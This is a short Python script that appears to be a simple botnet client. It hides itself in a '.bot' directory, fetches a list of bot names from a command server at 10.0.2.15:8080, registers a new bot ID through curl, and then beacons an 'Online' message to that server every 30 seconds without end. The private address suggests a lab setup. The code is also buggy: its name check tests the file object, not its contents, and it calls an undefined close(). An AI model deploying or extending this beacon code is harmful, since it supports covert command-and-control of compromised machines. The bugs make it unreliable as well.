#!/usr/bin/env python3

import sys
import os
import requests
from datetime import datetime
import time

##checking to see if directory exists and making directory on new machine
def directoryhandler():
	dir = os.path.join('./','.bot')
	if not os.path.exists(dir):
		os.mkdir(dir)
		os.chdir(dir)
		f = open('name.txt', 'w+')
		f.write('')
		f.close()
	else:
		os.chdir(dir)
def namecheck():
	botnames = requests.get('http://10.0.2.15:8080/botnames.txt')
	data = botnames.text.strip().split()
	lastbot = data[-1]
	with open('name.txt', 'r+') as f:
		if f not in data:
			myname = str(int(lastbot)+1)
			f.write(myname)
			request = 'curl -d '+myname+' http://10.0.2.15:8080/log.txt'
			os.system(request)
		else:
			close()
def beacon():
	myname = open('name.txt', 'r')
	x = datetime.now()
	current_time = x.strftime("%H:%M:%S")
	data = current_time+' Online '+myname.read()
	request = 'curl -d "'+data+'" http://10.0.2.15:8080/log.txt'
	starttime = time.time()
	while True:
		os.system(request)
		time.sleep(30 - ((time.time() - starttime) % 30))





if __name__ == '__main__':
	directoryhandler()
	namecheck()
	beacon()
